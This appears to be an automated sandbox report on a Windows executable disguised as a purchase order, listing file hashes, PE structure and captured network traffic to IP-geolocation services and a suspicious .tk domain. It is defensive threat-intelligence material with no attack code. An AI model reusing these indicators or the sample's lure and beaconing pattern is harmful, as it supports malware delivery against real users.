              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="335775" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):64
              Entropy (8bit):1.1940658735648508
              Encrypted:false
              SSDEEP:3:NlllulJnp/p:NllU
              MD5:BC6DB77EB243BF62DC31267706650173
              SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
              SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
              SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:@...e.................................X..............@..........

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gb1eegws.kbb.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Reputation:high, very likely benign file
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kstr1w5g.bn5.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vygn0e5n.2jg.psm1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wo3x5km0.qeo.ps1

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode

              C:\Windows\appcompat\Programs\Amcache.hve

              Download File
              Process:C:\Windows\System32\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1835008
              Entropy (8bit):4.469060473050792
              Encrypted:false
              SSDEEP:6144:PzZfpi6ceLPx9skLmb0fVZWSP3aJG8nAgeiJRMMhA2zX4WABluuNcjDH5S:bZHtVZWOKnMM6bFpuj4
              MD5:824F76B1F3C319C0C5AE885D4BB3750B
              SHA1:02CA8C54C3FDEBDD6108A3F338CDD3334F52DFA8
              SHA-256:5E9513DA01DFFD3001A338DBC15B42264A3DC8565E791E78AEB74B5207947723
              SHA-512:7240728A66C44B436D5FD1CCB1B5EEFAF8199D1FB3B8BCFFE9F1F4E1C0E7C20979CFD90A4B1CA76B292ECA6A8FAB0F68489F4A60B17CEB3112FA8DA99A3F3218
              Malicious:false
              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmv....................................................................................................................................................................................................................................................................................................................................................M..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

              Static File Info

              General

              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.95812711732152
              TrID:
              • Win64 Executable GUI Net Framework (217006/5) 49.88%
              • Win64 Executable GUI (202006/5) 46.43%
              • Win64 Executable (generic) (12005/4) 2.76%
              • Generic Win/DOS Executable (2004/3) 0.46%
              • DOS Executable Generic (2002/1) 0.46%
              File name:ORDEM DE COMPRA.exe
              File size:528'393 bytes
              MD5:46dab257847ea9cfbbc77979323212c4
              SHA1:8cbd33b3cf519807b2c986f7fbe3daae4175595f
              SHA256:1f522609abaf12c6647c56b379cdf2c9263a845a6b4c93bac7111d0c27d68159
              SHA512:ead6cefa6e39df40bdceed5dd6fb4dad3bad18d087f3d8f6d578c1e46236a32b2728e5e206b1aa7f1b6a63fa220cc87d0867be558895690000936cffd63c0dbe
              SSDEEP:12288:PMYSxPCxJLpWDH0MVk6V8y8OY9xQCiGVb+r:0YSJCxpk3T09iCjVE
              TLSH:4CB423B263BCD5B9F4DE96B8BE5385D47B61F3C103F2AD151226891848E06047E12FB7
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a............."...0.,................ ....@...... ....................................`................................

              File Icon

              Icon Hash:00928e8e8686b000

              Static PE Info

              General

              Entrypoint:0x400000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0xD4FC1361 [Fri Mar 26 12:30:25 2083 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:

              Entrypoint Preview

              Instruction
              dec ebp
              pop edx
              nop
              add byte ptr [ebx], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x93c.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0xc5100x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000xa52c0xa600f0764f4c3a23ac653f1a55d1bcb5f519False0.569300640060241data6.138273901734159IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xe0000x93c0xa0036cc8afdfdd369c2df4e53cc97eab695False0.30234375data4.376819931086736IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_VERSION0xe0b80x34cdata0.5011848341232228
              RT_VERSION0xe4040x34cdataEnglishUnited States0.5023696682464455
              RT_MANIFEST0xe7500x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 23, 2024 15:13:01.636555910 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:01.643546104 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:01.644836903 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:01.645076036 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:01.695990086 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:02.471041918 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:02.533023119 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:02.551199913 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:02.584522963 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:03.030545950 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:03.085228920 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:03.142474890 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.142570972 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.142692089 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.151637077 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.151671886 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.639877081 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.639985085 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.644551039 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.644577980 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.644951105 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.694247961 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.702755928 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.750499010 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.816538095 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.816633940 CEST44349700188.114.97.3192.168.2.6
              May 23, 2024 15:13:03.816693068 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.823518038 CEST49700443192.168.2.6188.114.97.3
              May 23, 2024 15:13:03.827977896 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:03.873053074 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:04.173777103 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:04.179071903 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:04.179127932 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:04.179306030 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:04.179804087 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:04.179820061 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:04.225364923 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:04.929470062 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:04.931991100 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:04.932039022 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:05.131644011 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:05.131736040 CEST44349702188.114.97.3192.168.2.6
              May 23, 2024 15:13:05.131803989 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:05.132658958 CEST49702443192.168.2.6188.114.97.3
              May 23, 2024 15:13:05.136231899 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:05.138392925 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:05.232949018 CEST8049704132.226.8.169192.168.2.6
              May 23, 2024 15:13:05.232961893 CEST8049699132.226.8.169192.168.2.6
              May 23, 2024 15:13:05.233046055 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:05.233135939 CEST4969980192.168.2.6132.226.8.169
              May 23, 2024 15:13:05.233206987 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:05.268780947 CEST8049704132.226.8.169192.168.2.6
              May 23, 2024 15:13:06.155486107 CEST8049704132.226.8.169192.168.2.6
              May 23, 2024 15:13:06.157150030 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.157191992 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.157267094 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.157507896 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.157517910 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.209871054 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.634095907 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.641765118 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.641798973 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.857614994 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.857744932 CEST44349707188.114.97.3192.168.2.6
              May 23, 2024 15:13:06.857821941 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.858239889 CEST49707443192.168.2.6188.114.97.3
              May 23, 2024 15:13:06.861354113 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.862246037 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.914686918 CEST8049709132.226.8.169192.168.2.6
              May 23, 2024 15:13:06.914700031 CEST8049704132.226.8.169192.168.2.6
              May 23, 2024 15:13:06.914810896 CEST4970480192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.914865971 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.915304899 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:06.968010902 CEST8049709132.226.8.169192.168.2.6
              May 23, 2024 15:13:07.840574980 CEST8049709132.226.8.169192.168.2.6
              May 23, 2024 15:13:07.842109919 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:07.842149973 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:07.842264891 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:07.842554092 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:07.842570066 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:07.881699085 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.322060108 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:08.330086946 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:08.330116034 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:08.512207985 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:08.512399912 CEST44349711188.114.97.3192.168.2.6
              May 23, 2024 15:13:08.512491941 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:08.512881041 CEST49711443192.168.2.6188.114.97.3
              May 23, 2024 15:13:08.515840054 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.516994953 CEST4971280192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.564919949 CEST8049712132.226.8.169192.168.2.6
              May 23, 2024 15:13:08.564935923 CEST8049709132.226.8.169192.168.2.6
              May 23, 2024 15:13:08.565015078 CEST4970980192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.565026045 CEST4971280192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.565377951 CEST4971280192.168.2.6132.226.8.169
              May 23, 2024 15:13:08.603998899 CEST8049712132.226.8.169192.168.2.6
              May 23, 2024 15:13:09.408503056 CEST8049712132.226.8.169192.168.2.6
              May 23, 2024 15:13:09.428881884 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:09.428932905 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:09.429003000 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:09.437096119 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:09.437120914 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:09.459872007 CEST4971280192.168.2.6132.226.8.169
              May 23, 2024 15:13:09.922116995 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:09.923841953 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:09.923912048 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:10.117738962 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:10.117886066 CEST44349713188.114.97.3192.168.2.6
              May 23, 2024 15:13:10.117969036 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:10.131207943 CEST49713443192.168.2.6188.114.97.3
              May 23, 2024 15:13:10.135210037 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:10.168211937 CEST8049714132.226.8.169192.168.2.6
              May 23, 2024 15:13:10.170484066 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:10.206820011 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:10.224009037 CEST8049714132.226.8.169192.168.2.6
              May 23, 2024 15:13:10.965600014 CEST8049714132.226.8.169192.168.2.6
              May 23, 2024 15:13:10.966928005 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:10.966974974 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:10.967037916 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:10.967262983 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:10.967281103 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:11.006793022 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:11.538213015 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:11.584847927 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:11.769164085 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:11.769192934 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:11.926091909 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:11.926292896 CEST44349715188.114.97.3192.168.2.6
              May 23, 2024 15:13:11.926381111 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:11.927098036 CEST49715443192.168.2.6188.114.97.3
              May 23, 2024 15:13:11.930778980 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:11.931376934 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:11.989612103 CEST8049716132.226.8.169192.168.2.6
              May 23, 2024 15:13:11.989698887 CEST8049714132.226.8.169192.168.2.6
              May 23, 2024 15:13:11.989850998 CEST4971480192.168.2.6132.226.8.169
              May 23, 2024 15:13:11.989851952 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:11.989902973 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:12.004544973 CEST8049716132.226.8.169192.168.2.6
              May 23, 2024 15:13:12.891972065 CEST8049716132.226.8.169192.168.2.6
              May 23, 2024 15:13:12.893459082 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:12.893497944 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:12.893580914 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:12.893934011 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:12.893946886 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:12.944232941 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.472737074 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:13.474829912 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:13.474857092 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:13.657196999 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:13.657325983 CEST44349717188.114.97.3192.168.2.6
              May 23, 2024 15:13:13.657435894 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:13.658030987 CEST49717443192.168.2.6188.114.97.3
              May 23, 2024 15:13:13.661947012 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.663109064 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.724730015 CEST8049718132.226.8.169192.168.2.6
              May 23, 2024 15:13:13.724744081 CEST8049716132.226.8.169192.168.2.6
              May 23, 2024 15:13:13.724970102 CEST4971680192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.725131035 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.725131035 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:13.799587011 CEST8049718132.226.8.169192.168.2.6
              May 23, 2024 15:13:14.962764978 CEST8049718132.226.8.169192.168.2.6
              May 23, 2024 15:13:14.964227915 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:14.964276075 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:14.964493990 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:14.964771032 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:14.964786053 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.008955002 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:15.459568024 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.461453915 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.461467028 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.648922920 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.649034977 CEST44349720188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.649272919 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.649622917 CEST49720443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.663669109 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:15.707017899 CEST8049718132.226.8.169192.168.2.6
              May 23, 2024 15:13:15.707113028 CEST4971880192.168.2.6132.226.8.169
              May 23, 2024 15:13:15.978382111 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.978439093 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:15.978509903 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.978926897 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:15.978940964 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:16.460797071 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:16.460900068 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:16.462693930 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:16.462707043 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:16.463047981 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:16.464323044 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:16.506500006 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:55.986635923 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:55.986804008 CEST44349722188.114.97.3192.168.2.6
              May 23, 2024 15:13:55.986881018 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:13:56.022802114 CEST49722443192.168.2.6188.114.97.3
              May 23, 2024 15:14:14.404112101 CEST8049712132.226.8.169192.168.2.6
              May 23, 2024 15:14:14.404295921 CEST4971280192.168.2.6132.226.8.169

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              May 23, 2024 15:13:01.594975948 CEST5817053192.168.2.61.1.1.1
              May 23, 2024 15:13:01.603986979 CEST53581701.1.1.1192.168.2.6
              May 23, 2024 15:13:03.108026028 CEST5041053192.168.2.61.1.1.1
              May 23, 2024 15:13:03.141047955 CEST53504101.1.1.1192.168.2.6
              May 23, 2024 15:13:15.664241076 CEST5622153192.168.2.61.1.1.1
              May 23, 2024 15:13:15.977629900 CEST53562211.1.1.1192.168.2.6
              May 23, 2024 15:13:16.555351973 CEST53510161.1.1.1192.168.2.6
              May 23, 2024 15:13:30.783941984 CEST5358134162.159.36.2192.168.2.6
              May 23, 2024 15:13:31.281265020 CEST5636653192.168.2.61.1.1.1
              May 23, 2024 15:13:31.340416908 CEST53563661.1.1.1192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              May 23, 2024 15:13:01.594975948 CEST192.168.2.61.1.1.10x4adeStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
              May 23, 2024 15:13:03.108026028 CEST192.168.2.61.1.1.10x9cb4Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
              May 23, 2024 15:13:15.664241076 CEST192.168.2.61.1.1.10xeb07Standard query (0)scratchdreams.tkA (IP address)IN (0x0001)false
              May 23, 2024 15:13:31.281265020 CEST192.168.2.61.1.1.10x5ed1Standard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
              May 23, 2024 15:13:01.603986979 CEST1.1.1.1192.168.2.60x4adeNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
              May 23, 2024 15:13:03.141047955 CEST1.1.1.1192.168.2.60x9cb4No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
              May 23, 2024 15:13:03.141047955 CEST1.1.1.1192.168.2.60x9cb4No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
              May 23, 2024 15:13:15.977629900 CEST1.1.1.1192.168.2.60xeb07No error (0)scratchdreams.tk188.114.97.3A (IP address)IN (0x0001)false
              May 23, 2024 15:13:15.977629900 CEST1.1.1.1192.168.2.60xeb07No error (0)scratchdreams.tk188.114.96.3A (IP address)IN (0x0001)false
              May 23, 2024 15:13:31.340416908 CEST1.1.1.1192.168.2.60x5ed1Name error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

              HTTP Request Dependency Graph

              • reallyfreegeoip.org
              • scratchdreams.tk
              • checkip.dyndns.org

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
